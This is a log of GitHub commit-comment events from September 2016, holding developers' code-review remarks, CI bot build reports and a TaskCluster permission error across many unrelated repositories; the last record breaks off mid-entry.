{"id":"4634148972","type":"CommitCommentEvent","actor":{"login":"dzhuang"},"repo":{"name":"inducer/relate"},"payload":{"comment":{"id":19216567,"position":54,"line":165,"path":"course/grading.py","commit_id":"008dcb016c3a5f5df78cf935f7558229095904e5","created_at":"2016-09-28T23:44:12Z","updated_at":"2016-09-28T23:44:12Z","body":"nvm, thx for the fix."}},"created_at":"2016-09-28T23:44:12Z"}
{"id":"4634149407","type":"CommitCommentEvent","actor":{"login":"PaulWoitaschek"},"repo":{"name":"PaulWoitaschek/MaterialAudiobookPlayer"},"payload":{"comment":{"id":19216569,"position":null,"line":null,"path":null,"commit_id":"7208e8e6b04bb7c1eb23df802d23b5c32d2e1d66","created_at":"2016-09-28T23:44:20Z","updated_at":"2016-09-28T23:44:20Z","body":"Why do you use a fragment transaction? Does .show not work in onActivityResult?"}},"created_at":"2016-09-28T23:44:20Z"}
{"id":"4634150151","type":"CommitCommentEvent","actor":{"login":"bgallmeister"},"repo":{"name":"h2oai/h2o-3"},"payload":{"comment":{"id":19216574,"position":32,"line":39,"path":"h2o-py/tests/testdir_algos/glrm/pyunit_glrm_PUBDEV_3454_NOFEATURE.py","commit_id":"68bbe6beac0cccabfafe330b1361070643c37614","created_at":"2016-09-28T23:44:32Z","updated_at":"2016-09-28T23:44:32Z","body":"I think you want endcsv - startcsv rather than endorc - startorc?"}},"created_at":"2016-09-28T23:44:32Z"}
{"id":"4634152694","type":"CommitCommentEvent","actor":{"login":"kito2"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19216582,"position":null,"line":null,"path":null,"commit_id":"408aa734e395b6f48d544468a3dc457003a463c7","created_at":"2016-09-28T23:45:17Z","updated_at":"2016-09-28T23:45:17Z","body":"Well done bro."}},"created_at":"2016-09-28T23:45:17Z"}
{"id":"4634157116","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/positron"},"payload":{"comment":{"id":19216587,"position":null,"line":null,"path":null,"commit_id":"52411d84e268d980b6cd174af024a953faf9389b","created_at":"2016-09-28T23:46:25Z","updated_at":"2016-09-28T23:46:25Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#A6lzy9N8RbC2UaLXE2U8-w"}},"created_at":"2016-09-28T23:46:25Z"}
{"id":"4634163094","type":"CommitCommentEvent","actor":{"login":"mibby"},"repo":{"name":"Phoenix616/ChestShopNotifier"},"payload":{"comment":{"id":19216598,"position":null,"line":null,"path":null,"commit_id":"eb0a2b77a7d9350249acc49ae29573c20b618737","created_at":"2016-09-28T23:48:04Z","updated_at":"2016-09-28T23:48:04Z","body":"Build failed to compile this commit. :o "}},"created_at":"2016-09-28T23:48:04Z"}
{"id":"4634172282","type":"CommitCommentEvent","actor":{"login":"MartinNowak"},"repo":{"name":"dlang/dmd"},"payload":{"comment":{"id":19216613,"position":33,"line":44,"path":"src/root/port.d","commit_id":"398719f1725ab86435e604682fbe8f41b91f708f","created_at":"2016-09-28T23:50:38Z","updated_at":"2016-09-28T23:50:38Z","body":"Bad idea, instead of defining the values for that target machine, you take the ones from dmd's host compiler.\r\nThat is dmd's float.init is now recursively defined by what the last dmd release used as float.init."}},"created_at":"2016-09-28T23:50:38Z"}
{"id":"4634174449","type":"CommitCommentEvent","actor":{"login":"DownSpiral"},"repo":{"name":"kwishnu/FragMental"},"payload":{"comment":{"id":19216618,"position":55,"line":54,"path":"game.js","commit_id":"87d156d53e352d890ecaec08e52bc0e1b88dae44","created_at":"2016-09-28T23:51:14Z","updated_at":"2016-09-28T23:51:14Z","body":"I like to make sure whatever closes a block is on the same tab level as it was opened. Even though you have the `View` lined up with the `/View` in this style, it is easier to read and see correct tabbedness when it is like:\r\n```\r\nreturn (\r\n  <View key={ key }>\r\n    <TouchableHighlight\r\n      style={ [ styles.tile, position ] }\r\n      underlayColor='#0F0'\r\n      onPress={ () => this.show(key) } >\r\n        <Text style={ styles.letter }>{ key }</Text>\r\n    </TouchableHighlight>\r\n  </View>\r\n);\r\n```"}},"created_at":"2016-09-28T23:51:14Z"}
{"id":"4634177596","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19216630,"position":null,"line":null,"path":null,"commit_id":"fb588cc683107fbb0e9dfc0acab1149122486c8c","created_at":"2016-09-28T23:52:05Z","updated_at":"2016-09-28T23:52:05Z","body":"master (evanweaver) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fb588cc683107fbb0e9dfc0acab1149122486c8c-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fb588cc683107fbb0e9dfc0acab1149122486c8c-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-90.26%25-yellow.svg)</a> \n"}},"created_at":"2016-09-28T23:52:05Z"}
{"id":"4634190371","type":"CommitCommentEvent","actor":{"login":"inducer"},"repo":{"name":"inducer/relate"},"payload":{"comment":{"id":19216655,"position":15,"line":738,"path":"course/page/inline.py","commit_id":"e71b8ea272f48cd5b2fe6554bbafbe21a86451c4","created_at":"2016-09-28T23:55:37Z","updated_at":"2016-09-28T23:55:37Z","body":"OK, got rid of it: 560b510. Let me know if you're not OK with that."}},"created_at":"2016-09-28T23:55:37Z"}
{"id":"4634197593","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19216670,"position":null,"line":null,"path":null,"commit_id":"fb588cc683107fbb0e9dfc0acab1149122486c8c","created_at":"2016-09-28T23:57:37Z","updated_at":"2016-09-28T23:57:37Z","body":"master (evanweaver) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fb588cc683107fbb0e9dfc0acab1149122486c8c-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-28T23:57:37Z"}
{"id":"4634199226","type":"CommitCommentEvent","actor":{"login":"DownSpiral"},"repo":{"name":"kwishnu/FragMental"},"payload":{"comment":{"id":19216676,"position":52,"line":47,"path":"game.js","commit_id":"87d156d53e352d890ecaec08e52bc0e1b88dae44","created_at":"2016-09-28T23:58:05Z","updated_at":"2016-09-28T23:58:05Z","body":"maybe rename position to be positionStyle as to not confuse it with its tiley coordinate position"}},"created_at":"2016-09-28T23:58:05Z"}
{"id":"4634200762","type":"CommitCommentEvent","actor":{"login":"DownSpiral"},"repo":{"name":"kwishnu/FragMental"},"payload":{"comment":{"id":19216681,"position":null,"line":null,"path":null,"commit_id":"87d156d53e352d890ecaec08e52bc0e1b88dae44","created_at":"2016-09-28T23:58:32Z","updated_at":"2016-09-28T23:58:32Z","body":"Looking good! Keep up the good work!"}},"created_at":"2016-09-28T23:58:32Z"}
{"id":"4634201717","type":"CommitCommentEvent","actor":{"login":"TheFakeMateo"},"repo":{"name":"TheFakeMateo/RedPlusPlus"},"payload":{"comment":{"id":19216683,"position":null,"line":null,"path":null,"commit_id":"37bf53b6c7b4e5eef9ffcccd4bf38096f6386ff3","created_at":"2016-09-28T23:58:48Z","updated_at":"2016-09-28T23:58:48Z","body":"If you break a substitute using Hyper Beam, you still have to recharge. If you break a substitute with Self-destruct or Explosion, you still faint."}},"created_at":"2016-09-28T23:58:48Z"}
{"id":"4634203332","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19216685,"position":null,"line":null,"path":null,"commit_id":"c61c3fd86be4928df3d148f2e12f0446f38a8f7f","created_at":"2016-09-28T23:59:17Z","updated_at":"2016-09-28T23:59:17Z","body":"os_2_0_develop (axelstudios) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-c61c3fd86be4928df3d148f2e12f0446f38a8f7f-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-c61c3fd86be4928df3d148f2e12f0446f38a8f7f-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-28T23:59:17Z"}
{"id":"4634204406","type":"CommitCommentEvent","actor":{"login":"ifdog"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19216690,"position":null,"line":null,"path":null,"commit_id":"e710914af611aa42ba5454c22a71ff8b7bfdda02","created_at":"2016-09-28T23:59:34Z","updated_at":"2016-09-28T23:59:34Z","body":"卧槽，DSL！ 你写完了我学习下。"}},"created_at":"2016-09-28T23:59:34Z"}
{"id":"4634205138","type":"CommitCommentEvent","actor":{"login":"EpicSteve33"},"repo":{"name":"kaliiks/KingdomCore"},"payload":{"comment":{"id":19216693,"position":null,"line":null,"path":null,"commit_id":"c30d32eeee56ac48f834849a651268651666344e","created_at":"2016-09-28T23:59:46Z","updated_at":"2016-09-28T23:59:46Z","body":"@kaliiks um sir this is not yours to mess with"}},"created_at":"2016-09-28T23:59:46Z"}
{"id":"4634205544","type":"CommitCommentEvent","actor":{"login":"FottyM"},"repo":{"name":"kenigbolo/Chafity"},"payload":{"comment":{"id":19216694,"position":null,"line":null,"path":null,"commit_id":"b5f2822c0898ddb65b876a84015361cf964f93bc","created_at":"2016-09-28T23:59:52Z","updated_at":"2016-09-28T23:59:52Z","body":"@Kennu76 did it work on your machine? \r\n"}},"created_at":"2016-09-28T23:59:52Z"}
{"id":"4628221641","type":"CommitCommentEvent","actor":{"login":"QuantumSpark"},"repo":{"name":"ubclaunchpad/RocketCast"},"payload":{"comment":{"id":19201461,"position":49,"line":49,"path":"RocketCast/CoreDataHelper.swift","commit_id":"4dbbedc23126cdc2e19eabf0b3659501a2b3fb4e","created_at":"2016-09-28T03:00:30Z","updated_at":"2016-09-28T03:00:30Z","body":"I will agree I will add that"}},"created_at":"2016-09-28T03:00:30Z"}
{"id":"4628223102","type":"CommitCommentEvent","actor":{"login":"ZhiRenWang"},"repo":{"name":"SherrinaFanClub/test"},"payload":{"comment":{"id":19201463,"position":2,"line":2,"path":"测试 孤狼","commit_id":"9ea429bcd3300dc93e9ea3d77d64805d4782b3dc","created_at":"2016-09-28T03:00:57Z","updated_at":"2016-09-28T03:00:57Z","body":"sweqweqfsdqqweq"}},"created_at":"2016-09-28T03:00:57Z"}
{"id":"4628223351","type":"CommitCommentEvent","actor":{"login":"ajjahn"},"repo":{"name":"clearwater-rb/clearwater"},"payload":{"comment":{"id":19201466,"position":null,"line":null,"path":null,"commit_id":"24832608e7adc432537cc4d731a9d1326e463d76","created_at":"2016-09-28T03:01:02Z","updated_at":"2016-09-28T03:01:02Z","body":"Unfortunately moving the route transition callbacks out of `set_outlets` mean the callbacks are no longer called on page load."}},"created_at":"2016-09-28T03:01:02Z"}
{"id":"4628224104","type":"CommitCommentEvent","actor":{"login":"JuntaoMei"},"repo":{"name":"JuntaoMei/Dashi"},"payload":{"comment":{"id":19201471,"position":null,"line":null,"path":null,"commit_id":"fe7f4659ea2989233f5e06e263f690609efba16d","created_at":"2016-09-28T03:01:19Z","updated_at":"2016-09-28T03:01:19Z","body":"test"}},"created_at":"2016-09-28T03:01:19Z"}
{"id":"4628224288","type":"CommitCommentEvent","actor":{"login":"ZhiRenWang"},"repo":{"name":"SherrinaFanClub/test"},"payload":{"comment":{"id":19201472,"position":1,"line":1,"path":"测试 孤狼","commit_id":"9ea429bcd3300dc93e9ea3d77d64805d4782b3dc","created_at":"2016-09-28T03:01:23Z","updated_at":"2016-09-28T03:01:23Z","body":"qweqwe"}},"created_at":"2016-09-28T03:01:23Z"}
{"id":"4628226192","type":"CommitCommentEvent","actor":{"login":"crookedneighbor"},"repo":{"name":"HabitRPG/habitrpg"},"payload":{"comment":{"id":19201482,"position":24,"line":921,"path":"website/server/models/group.js","commit_id":"6726855b7d3850d2d1eab344f48ce3c98824c39b","created_at":"2016-09-28T03:02:05Z","updated_at":"2016-09-28T03:02:05Z","body":"Let's return early here:\r\n\r\n```js\r\nif (user.contributor.level >= SPAM_CONTRIBUTOR_LEVEL) {\r\n  return;\r\n}\r\n\r\nlet currentTime = // rest\r\n```\r\n"}},"created_at":"2016-09-28T03:02:05Z"}
{"id":"4628227943","type":"CommitCommentEvent","actor":{"login":"crookedneighbor"},"repo":{"name":"HabitRPG/habitrpg"},"payload":{"comment":{"id":19201494,"position":25,"line":922,"path":"website/server/models/group.js","commit_id":"6726855b7d3850d2d1eab344f48ce3c98824c39b","created_at":"2016-09-28T03:02:43Z","updated_at":"2016-09-28T03:02:43Z","body":"`Date.now()` will do exactly what you're doing here. Let's use that."}},"created_at":"2016-09-28T03:02:43Z"}
{"id":"4628230854","type":"CommitCommentEvent","actor":{"login":"joshim5"},"repo":{"name":"zou3519/cs263lab1"},"payload":{"comment":{"id":19201503,"position":4,"line":41,"path":"answers.txt","commit_id":"51db6f3947169a8b900af5aedba8d6f9d8233d4f","created_at":"2016-09-28T03:03:48Z","updated_at":"2016-09-28T03:03:48Z","body":"yep good add Richard"}},"created_at":"2016-09-28T03:03:48Z"}
{"id":"4628232248","type":"CommitCommentEvent","actor":{"login":"crookedneighbor"},"repo":{"name":"HabitRPG/habitrpg"},"payload":{"comment":{"id":19201505,"position":22,"line":919,"path":"website/server/models/group.js","commit_id":"6726855b7d3850d2d1eab344f48ce3c98824c39b","created_at":"2016-09-28T03:04:16Z","updated_at":"2016-09-28T03:04:16Z","body":"This should have unit tests. https://github.com/HabitRPG/habitrpg/blob/develop/test/api/v3/unit/models/group.test.js\r\n\r\n"}},"created_at":"2016-09-28T03:04:16Z"}
{"id":"4628234103","type":"CommitCommentEvent","actor":{"login":"gabrielRosa"},"repo":{"name":"gabrielRosa/crescer-2016-2"},"payload":{"comment":{"id":19201510,"position":13,"line":13,"path":"src/modulo-01-java-OO/modulo-01/ElfoTest.java","commit_id":"1c12038aeab0f0813b5ec715216c8d5312176f6d","created_at":"2016-09-28T03:04:58Z","updated_at":"2016-09-28T03:04:58Z","body":"A indentação procurei utilizar a do BlueJ. Teria outra mais interessante? "}},"created_at":"2016-09-28T03:04:58Z"}
{"id":"4628235119","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19201516,"position":null,"line":null,"path":null,"commit_id":"e5ab0940f7fc1ced4c80848c91ee0b356ce8afee","created_at":"2016-09-28T03:05:20Z","updated_at":"2016-09-28T03:05:20Z","body":"license-update (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e5ab0940f7fc1ced4c80848c91ee0b356ce8afee-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-28T03:05:20Z"}
{"id":"4628236160","type":"CommitCommentEvent","actor":{"login":"gabrielRosa"},"repo":{"name":"gabrielRosa/crescer-2016-2"},"payload":{"comment":{"id":19201520,"position":1,"line":1,"path":"src/modulo-01-java-OO/modulo-01/Dwarves.java","commit_id":"8916711fc8c6c471f46438b825a6aabd1bd75290","created_at":"2016-09-28T03:05:44Z","updated_at":"2016-09-28T03:05:44Z","body":"Correto atualizarei o código."}},"created_at":"2016-09-28T03:05:44Z"}
{"id":"4628242321","type":"CommitCommentEvent","actor":{"login":"samikang"},"repo":{"name":"samikang/tic_tac_toe_N-N"},"payload":{"comment":{"id":19201540,"position":null,"line":null,"path":null,"commit_id":"0d2437fde4ac1a5250daba99b7c04dc7a43b952a","created_at":"2016-09-28T03:07:56Z","updated_at":"2016-09-28T03:07:56Z","body":"ok"}},"created_at":"2016-09-28T03:07:56Z"}
{"id":"4628243883","type":"CommitCommentEvent","actor":{"login":"SimonOrJ"},"repo":{"name":"bontrose/s4xbot"},"payload":{"comment":{"id":19201545,"position":11,"line":26,"path":"s4xb0t.py","commit_id":"f84edc7896fbfcd39da3aeb807963cb35e83cdf0","created_at":"2016-09-28T03:08:31Z","updated_at":"2016-09-28T03:08:31Z","body":"Isn't that exactly what you coded...?"}},"created_at":"2016-09-28T03:08:31Z"}
{"id":"4628246879","type":"CommitCommentEvent","actor":{"login":"jgaskins"},"repo":{"name":"clearwater-rb/clearwater"},"payload":{"comment":{"id":19201554,"position":null,"line":null,"path":null,"commit_id":"24832608e7adc432537cc4d731a9d1326e463d76","created_at":"2016-09-28T03:09:29Z","updated_at":"2016-09-28T03:09:29Z","body":"Good point, should call them all on first render. I'm still working on this anyway because I broke the build somehow. I was pretty sure the specs were passing last night.\r\n\r\nLittle-known fact: this router is my least favorite part of Clearwater."}},"created_at":"2016-09-28T03:09:29Z"}
{"id":"4628247420","type":"CommitCommentEvent","actor":{"login":"SimonOrJ"},"repo":{"name":"bontrose/s4xbot"},"payload":{"comment":{"id":19201555,"position":11,"line":26,"path":"s4xb0t.py","commit_id":"f84edc7896fbfcd39da3aeb807963cb35e83cdf0","created_at":"2016-09-28T03:09:38Z","updated_at":"2016-09-28T03:09:38Z","body":"Oh, I see.  Maybe you can do a numeric check, or make \"!d\" or \"!dice\" a command with an argument that accepts a number"}},"created_at":"2016-09-28T03:09:38Z"}
{"id":"4628249808","type":"CommitCommentEvent","actor":{"login":"xiaomuhu"},"repo":{"name":"xiaomuhu/algorithms"},"payload":{"comment":{"id":19201561,"position":1,"line":1,"path":"README.md","commit_id":"c178e21ba87818ba1f37007a8cee86dff85e55ad","created_at":"2016-09-28T03:10:35Z","updated_at":"2016-09-28T03:10:35Z","body":"算法使用"}},"created_at":"2016-09-28T03:10:35Z"}
{"id":"4628250859","type":"CommitCommentEvent","actor":{"login":"LeonardoAlmeida96"},"repo":{"name":"LeonardoAlmeida96/crescer-2016-2"},"payload":{"comment":{"id":19201563,"position":8,"line":8,"path":"src/modulo-01-java-OO/modulo-01/CestoDeLembas.java","commit_id":"0af37ddb48f253f14b190b9bda712cba02cc4cc7","created_at":"2016-09-28T03:10:57Z","updated_at":"2016-09-28T03:10:57Z","body":"Ok, vou remover a condição de menor que 0 e maior que 100."}},"created_at":"2016-09-28T03:10:57Z"}
{"id":"4628252150","type":"CommitCommentEvent","actor":{"login":"yuripv"},"repo":{"name":"openzfs/openzfs"},"payload":{"comment":{"id":19201566,"position":5,"line":76,"path":"usr/src/uts/common/fs/zfs/zrlock.c","commit_id":"866d7cc884f113f4b53269b57fbf6bb4ea70ff38","created_at":"2016-09-28T03:11:27Z","updated_at":"2016-09-28T03:11:27Z","body":"just use for(;;) here instead of silencing lint?"}},"created_at":"2016-09-28T03:11:27Z"}
{"id":"4628252175","type":"CommitCommentEvent","actor":{"login":"LeonardoAlmeida96"},"repo":{"name":"LeonardoAlmeida96/crescer-2016-2"},"payload":{"comment":{"id":19201567,"position":24,"line":24,"path":"src/modulo-01-java-OO/modulo-01/CestoDeLembas.java","commit_id":"0af37ddb48f253f14b190b9bda712cba02cc4cc7","created_at":"2016-09-28T03:11:27Z","updated_at":"2016-09-28T03:11:27Z","body":"Obrigado pela dica, não sabia que poderia fazer direto."}},"created_at":"2016-09-28T03:11:27Z"}
{"id":"4628254645","type":"CommitCommentEvent","actor":{"login":"fbormann"},"repo":{"name":"amadeusproject/amadeuslms"},"payload":{"comment":{"id":19201576,"position":null,"line":null,"path":null,"commit_id":"ffdd0fc448ae33be290811d17059bd6a56f50d01","created_at":"2016-09-28T03:12:23Z","updated_at":"2016-09-28T03:12:23Z","body":"Quando rodo \"python3 manage.py test core.tests\", o teste de usuários não aparece, no seu aparece @ailsoncgt ?"}},"created_at":"2016-09-28T03:12:23Z"}
{"id":"4628255456","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19201579,"position":null,"line":null,"path":null,"commit_id":"34a5020df0f106c14b556990bf7d3f0f54841839","created_at":"2016-09-28T03:12:43Z","updated_at":"2016-09-28T03:12:43Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - Win64-Windows-7-VisualStudio-12: Tests Failed (1767 of 2340 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34a5020df0f106c14b556990bf7d3f0f54841839-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34a5020df0f106c14b556990bf7d3f0f54841839-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-75.51%25-red.svg)</a> \n"}},"created_at":"2016-09-28T03:12:43Z"}
{"id":"4628255898","type":"CommitCommentEvent","actor":{"login":"gabrielRosa"},"repo":{"name":"gabrielRosa/crescer-2016-2"},"payload":{"comment":{"id":19201580,"position":5,"line":11,"path":"src/modulo-01-java-OO/modulo-01/CestoDeLembas.java","commit_id":"4c61deb596cc30285c9a719d2381d5eafecbfda2","created_at":"2016-09-28T03:12:54Z","updated_at":"2016-09-28T03:12:54Z","body":"OK, mas como saberei se cada personagem ficará com uma quantidade par?\r\nE fiquei com uma dúvida em relação a origem da quantidade de personagens."}},"created_at":"2016-09-28T03:12:54Z"}
{"id":"4628256966","type":"CommitCommentEvent","actor":{"login":"LeonardoAlmeida96"},"repo":{"name":"LeonardoAlmeida96/crescer-2016-2"},"payload":{"comment":{"id":19201586,"position":15,"line":15,"path":"src/modulo-01-java-OO/modulo-01/CestoDeLembasTest.java","commit_id":"962c29b072253d32a6b22fee05787e6db2876ff0","created_at":"2016-09-28T03:13:20Z","updated_at":"2016-09-28T03:13:20Z","body":"Obrigado a dica, não conhecia essa função."}},"created_at":"2016-09-28T03:13:20Z"}
{"id":"4628257273","type":"CommitCommentEvent","actor":{"login":"3TUSK"},"repo":{"name":"3TUSK/IndustrialMachine"},"payload":{"comment":{"id":19201588,"position":20,"line":20,"path":"src/main/resources/assets/inductivemachine/gui/inductive_machine.xml","commit_id":"d1b0d5593126fd7a6d4a041b84bb71a4b88d8d91","created_at":"2016-09-28T03:13:27Z","updated_at":"2016-09-28T03:13:27Z","body":"To-do: don't mix tab and quadraspace"}},"created_at":"2016-09-28T03:13:27Z"}
{"id":"4628261106","type":"CommitCommentEvent","actor":{"login":"crookedneighbor"},"repo":{"name":"HabitRPG/habitrpg"},"payload":{"comment":{"id":19201600,"position":35,"line":104,"path":"website/server/controllers/api-v3/chat.js","commit_id":"6726855b7d3850d2d1eab344f48ce3c98824c39b","created_at":"2016-09-28T03:15:00Z","updated_at":"2016-09-28T03:15:00Z","body":"The one problem with throwing in the function is that you will also need to pass in the res object as well. You know what, leave the function name as is for now. "}},"created_at":"2016-09-28T03:15:00Z"}
{"id":"4628262914","type":"CommitCommentEvent","actor":{"login":"3TUSK"},"repo":{"name":"3TUSK/IndustrialMachine"},"payload":{"comment":{"id":19201604,"position":4,"line":4,"path":"src/main/resources/assets/inductivemachine/lang/de_DE.lang","commit_id":"d1b0d5593126fd7a6d4a041b84bb71a4b88d8d91","created_at":"2016-09-28T03:15:41Z","updated_at":"2016-09-28T03:15:41Z","body":"Inherit from work done by @Vexatos (i.e. https://github.com/FrogCraft/FrogCraft/commit/bb14ab6d62fcb4c82dd2628e0b01255840200e87#diff-38fcb344ce44e8f886a193b3973ea165R119)\r\n\r\nTo-do: add credit"}},"created_at":"2016-09-28T03:15:41Z"}
{"id":"4628265521","type":"CommitCommentEvent","actor":{"login":"mackncheesiest"},"repo":{"name":"mackncheesiest/ECE474A_Projects"},"payload":{"comment":{"id":19201612,"position":null,"line":null,"path":null,"commit_id":"280cb00f686abe5ec84a070e56718dd878304c19","created_at":"2016-09-28T03:16:43Z","updated_at":"2016-09-28T03:16:43Z","body":"Lol, right as soon as I looked through f577cfbabc47527628207529ad51e57bdd45df64 I was like \"oh no! I need to add a .gitignore\", but I see you did it here"}},"created_at":"2016-09-28T03:16:43Z"}
{"id":"4628269428","type":"CommitCommentEvent","actor":{"login":"0e4ef622"},"repo":{"name":"Abrahamh08/Mandelbrot-Set-Generator"},"payload":{"comment":{"id":19201623,"position":null,"line":null,"path":null,"commit_id":"ae1394182bb440858aeadef0dd40242e6e287ee6","created_at":"2016-09-28T03:18:12Z","updated_at":"2016-09-28T03:18:12Z","body":"y u no author informations"}},"created_at":"2016-09-28T03:18:12Z"}
{"id":"4628270410","type":"CommitCommentEvent","actor":{"login":"001101"},"repo":{"name":"humhub/humhub-modules-custom-pages"},"payload":{"comment":{"id":19201625,"position":null,"line":null,"path":null,"commit_id":"b2bff948725aaa0cd98456c67e7560b0cb98ca5e","created_at":"2016-09-28T03:18:33Z","updated_at":"2016-09-28T03:18:33Z","body":"Nice to have, but not working with my nginx config:\r\n\r\nlocation /   {\r\ntry_files $uri $uri/ /index.php?$args;\r\n}\r\n\r\nlocation ~ \\.php$ {\r\n            fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;\r\n            if (!-f $document_root$fastcgi_script_name) {\r\n                return  404;\r\n            }\r\n            fastcgi_split_path_info ^(.+\\.php)(.*)$;\r\n            fastcgi_keep_conn on;\r\n            fastcgi_pass    127.0.0.1:9005;\r\n            fastcgi_index   index.php;\r\n            fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;\r\n            include         /etc/nginx/fastcgi_params;\r\n        }\r\n"}},"created_at":"2016-09-28T03:18:33Z"}
{"id":"4628271675","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":19201629,"position":null,"line":null,"path":null,"commit_id":"4760569093551867dee0c25d0d820f1f9915a424","created_at":"2016-09-28T03:19:00Z","updated_at":"2016-09-28T03:19:00Z","body":"Submitting the task to TaskCluster failed. You didn't give the task-graph scopes allowing it define tasks on the queue.Details:\n\n```js\n[\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"CBYGBldpTCiQxYFOoL7tYQ\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_docs\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_docs\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_docs\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_docs\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.opened\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 60,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"95815afcfc5c2871e7f7ed870e3238fc5a5fdc3e\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/garbas/mozilla-releng-services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"4760569093551867dee0c25d0d820f1f9915a424\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"trychooser\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n 